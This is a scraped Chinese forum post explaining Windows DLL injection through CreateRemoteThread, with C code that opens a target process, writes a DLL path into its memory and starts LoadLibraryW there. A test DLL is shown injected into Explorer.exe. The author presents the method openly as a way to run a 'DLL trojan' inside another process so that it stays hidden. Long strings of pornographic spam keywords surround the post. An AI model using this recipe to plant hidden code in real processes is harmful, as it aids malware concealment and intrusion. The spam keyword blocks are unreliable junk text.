久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区


曙海教育集團(tuán)論壇開發(fā)語言培訓(xùn)專區(qū)VB語言 → 用vb和c語言來進(jìn)行遠(yuǎn)程線形技術(shù)


  共有8757人關(guān)注過本帖樹形打印

主題:用vb和c語言來進(jìn)行遠(yuǎn)程線形技術(shù)

美女呀,離線,留言給我吧!
wangxinxin
  1樓 個性首頁 | 博客 | 信息 | 搜索 | 郵箱 | 主頁 | UC


加好友 發(fā)短信
等級:青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊:2010-11-12 11:08:23
用vb和c語言來進(jìn)行遠(yuǎn)程線形技術(shù)  發(fā)帖心情 Post By:2010-12-14 14:39:24


遠(yuǎn)程線程技術(shù)指的是通過在另一個進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法進(jìn)入那個進(jìn)程的內(nèi)存地址空間。我們知道,在進(jìn)程中,可以通過CreateThread函數(shù)創(chuàng)建線程,被創(chuàng)建的新線程與主線程(就是進(jìn)程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。 但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進(jìn)程內(nèi)創(chuàng)建新線程,被創(chuàng)建的遠(yuǎn)程線程同樣可以共享遠(yuǎn)程進(jìn)程(是遠(yuǎn)程進(jìn)程耶!)的地址空間,所以,實(shí)際上,我們通過一個遠(yuǎn)程線程,進(jìn)入了遠(yuǎn)程進(jìn)程的內(nèi)存地址空間,也就擁有了那個遠(yuǎn)程進(jìn)程相當(dāng)?shù)臋?quán)限。例如在遠(yuǎn)程進(jìn)程內(nèi)部啟動一個DLL木馬(與進(jìn)入進(jìn)程內(nèi)部相比,啟動一個DLL木馬是小意思,實(shí)際上我們可以隨意篡改那個遠(yuǎn)程進(jìn)程的數(shù)據(jù))。

  首先,我們通過OpenProcess 來打開我們試圖嵌入的進(jìn)程(如果遠(yuǎn)程進(jìn)程不允許打開,那么嵌入就無法進(jìn)行了,這往往是由于權(quán)限不足引起的,解決方法是通過種種途徑提升本地進(jìn)程的權(quán)限) 

 hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | file://允許遠(yuǎn)程創(chuàng)建線程 
                PROCESS_VM_OPERATION | file://允許遠(yuǎn)程VM操作 
                PROCESS_VM_WRITE,//允許遠(yuǎn)程VM寫 
                FALSE, dwRemoteProcessId ) 

  由于我們后面需要寫入遠(yuǎn)程進(jìn)程的內(nèi)存地址空間并建立遠(yuǎn)程線程,所以需要申請足夠的權(quán)限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。 

  然后,我們可以建立LoadLibraryW函數(shù)這個線程來啟動我們的DLL木馬,LoadLibraryW函數(shù)是在kernel32.dll中定義的,用來加載DLL文件,它只有一個參數(shù),就是DLL文件的絕對路徑名pszLibFileName,(也就是木馬DLL的全路徑文件名),但是由于木馬DLL是在遠(yuǎn)程進(jìn)程內(nèi)調(diào)用的,所以我們首先還需要將這個文件名復(fù)制到遠(yuǎn)程地址空間:(否則遠(yuǎn)程線程是無法讀到這個參數(shù)的) 

 file://計算DLL路徑名需要的內(nèi)存空間 
 int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); 
 file://使用VirtualAllocEx函數(shù)在遠(yuǎn)程進(jìn)程的內(nèi)存地址空間分配DLL文件名緩沖區(qū) 
 pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, 
            MEM_COMMIT, PAGE_READWRITE); 
 file://使用WriteProcessMemory函數(shù)將DLL的路徑名復(fù)制到遠(yuǎn)程進(jìn)程的內(nèi)存空間 
 iReturnCode = WriteProcessMemory(hRemoteProcess, 
            pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 
 file://計算LoadLibraryW的入口地址 
 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) 
     GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); 

  萬事俱備,我們通過建立遠(yuǎn)程線程時的地址pfnStartAddr(實(shí)際上就是LoadLibraryW的入口地址)和傳遞的參數(shù)pszLibFileRemote(實(shí)際上是我們復(fù)制過去的木馬DLL的全路徑文件名)在遠(yuǎn)程進(jìn)程內(nèi)啟動我們的木馬DLL: 

 file://啟動遠(yuǎn)程線程LoadLibraryW,通過遠(yuǎn)程線程調(diào)用用戶的DLL文件 
 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, 
                 pfnStartAddr, pszLibFileRemote, 0, NULL); 

  至此,遠(yuǎn)程嵌入順利完成,為了試驗我們的DLL是不是已經(jīng)正常的在遠(yuǎn)程線程運(yùn)行,我編寫了以下的測試DLL: 

 BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved) 
   { 
    char szProcessId[64] ; 
    switch ( reason ) 
     { 
      case DLL_PROCESS_ATTACH: 
       { 
         file://獲取當(dāng)前進(jìn)程ID 
         _itoa ( GetCurrentProcessId(), szProcessId, 10 ); 
         MessageBox ( NULL, szProcessId, "RemoteDLL", MB_OK ); 
       } 
      default: 
      return TRUE; 
     } 
   } 

  當(dāng)我使用RmtDll.exe程序?qū)⑦@個TestDLL.dll嵌入Explorer.exe進(jìn)程后(PID=1208),該測試DLL彈出了1208字樣的確認(rèn)框,同時使用PS工具也能看到 

   Process ID: 1208 
   C:WINNTExplorer.exe (0x00400000) 
   …… 
   C:TestDLL.dll (0x100000000) 
   …… 

  這證明TestDLL.dll已經(jīng)在Explorer.exe進(jìn)程內(nèi)正確地運(yùn)行了。 

  無論是使用特洛伊DLL還是使用遠(yuǎn)程線程,都是讓木馬的核心代碼運(yùn)行于別的進(jìn)程的內(nèi)存空間,這樣不僅能很好地隱藏自己,也能更好的保護(hù)自己。


支持(0中立(0反對(0單帖管理 | 引用 | 回復(fù) 回到頂部

返回版面帖子列表

用vb和c語言來進(jìn)行遠(yuǎn)程線形技術(shù)








簽名
久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区
男女性色大片免费观看一区二区 | 国产不卡一区二区在线观看| 国内成人免费视频| 久久精品999| 经典三级视频一区| 国产一区在线不卡| 成人性生交大合| 成人午夜精品一区二区三区| av成人动漫在线观看| 91成人理论电影| 麻豆成人av| 午夜欧美性电影| 亚洲日本理论电影| 欧美日韩精品三区| 91精品欧美福利在线观看 | 国产精品毛片高清在线完整版| 中文字幕免费在线观看视频一区| 国产精品成人免费在线| 亚洲成人av一区二区三区| 美女视频黄 久久| 成人黄色小视频| 精品国产乱码久久久久久丨区2区 精品国产乱码久久久久久蜜柚 | 97se亚洲国产综合自在线 | 一本到高清视频免费精品| 欧美日本在线观看| 久久精品欧美日韩精品 | 国产精品女同一区二区三区| 一区二区在线观看免费| 青青草97国产精品免费观看 | 99在线精品观看| 久久综合久久久| 欧洲亚洲精品在线| 久久久久久久久久久99999| 亚洲蜜桃精久久久久久久| 男人的天堂亚洲一区| 99国产精品视频免费观看| 欧美精品亚洲精品| 欧美伦理电影网| 国产精品久久久久久亚洲毛片 | 国产精品一二三| 国产综合精品一区二区三区| 色狠狠色噜噜噜综合网| 欧美成va人片在线观看| 亚洲制服丝袜av| 成人综合婷婷国产精品久久免费| 黑人另类av| 91麻豆精品国产自产在线观看一区| 久久精品夜夜夜夜久久| 午夜精品在线看| 91原创国产| 色菇凉天天综合网| 国产精品午夜在线| 久久国产综合精品| 精品蜜桃一区二区三区| 欧美日韩一级二级| 一区二区三区在线视频播放| 国产 日韩 欧美大片| 日本一区视频在线观看| 精品久久久网站| 美女在线视频一区| 日本不卡一区| 欧美国产欧美综合| 国产91色综合久久免费分享| 视频一区视频二区视频| 久久久久9999亚洲精品| 日本欧美一区二区三区| 久久99精品久久久久久秒播放器 | 一区二区视频在线| 97成人超碰视| 91精品国产福利| 日韩电影在线观看电影| 国产精品果冻传媒潘| 宅男噜噜噜66一区二区66| 五月天激情小说综合| 国产精品裸体一区二区三区| 日韩欧美高清dvd碟片| 麻豆极品一区二区三区| 青青草久久网络| 国产精品高潮呻吟| 国产精品一级片| 在线免费亚洲电影| 亚洲美女淫视频| 精品国产一区二区三区麻豆小说 | 欧美色偷偷大香| 亚洲激情男女视频| 国产日本一区二区三区| 精品成人佐山爱一区二区| 精品一区二区三区在线观看国产 | 色综合中文字幕国产 | 亚洲人xxxx| 91超碰在线免费观看| 日韩视频一区二区三区在线播放| 久久草av在线| 欧美午夜精品电影| 人人狠狠综合久久亚洲| 在线国产精品网| 日韩精品福利网| 中国人体摄影一区二区三区| 亚洲国产美国国产综合一区二区| 精品一区久久久久久| 国产精品狼人久久影院观看方式| 91视频免费播放| 91精品国产综合久久久蜜臀粉嫩| 美女www一区二区| 在线观看91视频| 久草这里只有精品视频| 精品视频在线视频| 国产精品综合久久| 日韩精品一区二区三区三区免费| 懂色中文一区二区在线播放| 欧美不卡一区二区| 9l国产精品久久久久麻豆| 欧美美女一区二区在线观看| 国产电影一区在线| 精品久久久久久久久久久久包黑料| 丁香一区二区三区| 精品不卡在线视频| www.久久爱.cn| 亚洲色图视频免费播放| 视频一区不卡| 免费的国产精品| 欧美一区二区三区视频在线观看| 国产99一区视频免费| 久久网这里都是精品| 国产欧美日韩视频一区二区三区| 最近日韩中文字幕| 一区二区三区偷拍| 久久99精品国产91久久来源| 91精品综合久久久久久| 99视频一区二区| 亚洲欧洲av另类| 色噜噜狠狠成人中文综合| 国产伦精品一区二区三区免费| 2024国产精品视频| 欧美一级二级三级| 久久av中文字幕片| 久久久精品黄色| 亚洲欧洲三级| 成人精品gif动图一区| 国产精品乱码一区二区三区软件| 亚洲成人自拍视频| 国产精品主播直播| 国产精品国产a| 欧美性感一区二区三区| 99久久久精品| 亚洲午夜视频在线观看| 欧美高清性hdvideosex| 精品免费视频123区| 久久精品国产亚洲高清剧情介绍| 欧美www视频| 图片区小说区区亚洲五月| 国产一区二区三区电影在线观看 | 在线观看区一区二| 91久久爱成人| 日本vs亚洲vs韩国一区三区| 精品国产乱码久久久久久图片| 久久香蕉综合色| 国产精品性做久久久久久| 最新高清无码专区| 日韩一级黄色大片| 性欧美大战久久久久久久免费观看| 成人性生交大合| 亚洲国产美国国产综合一区二区| 日韩欧美一级片| 色狠狠久久av五月综合|| 成人午夜视频福利| 午夜精品久久久久久久蜜桃app | 91精品欧美福利在线观看| 久久精品午夜一区二区福利| 韩国v欧美v亚洲v日本v| 亚洲男帅同性gay1069| 欧美一卡二卡在线观看| 色综合久久av| 99久久精品免费看国产一区二区三区| 天天综合日日夜夜精品| 久久精品一区二区三区不卡| 欧美色图在线观看| 色一情一乱一伦一区二区三区| 9l国产精品久久久久麻豆| 麻豆精品一区二区综合av| 亚洲精品欧美激情| 久久久99免费| 欧美精品乱人伦久久久久久| 亚洲黄色一区二区三区| 国产视频一区二区三区四区| 国产麻豆精品视频| 日韩—二三区免费观看av| 中文字幕亚洲不卡| 欧美成人免费网站| 欧美图片一区二区三区| 性欧美.com| 久久国产精品精品国产色婷婷| www.欧美.com| 国产一区999| 无码av免费一区二区三区试看| 1区2区3区国产精品| 国产网红主播福利一区二区| 日韩一级高清毛片| 欧美日韩色一区| 欧美视频一区二区三区在线观看|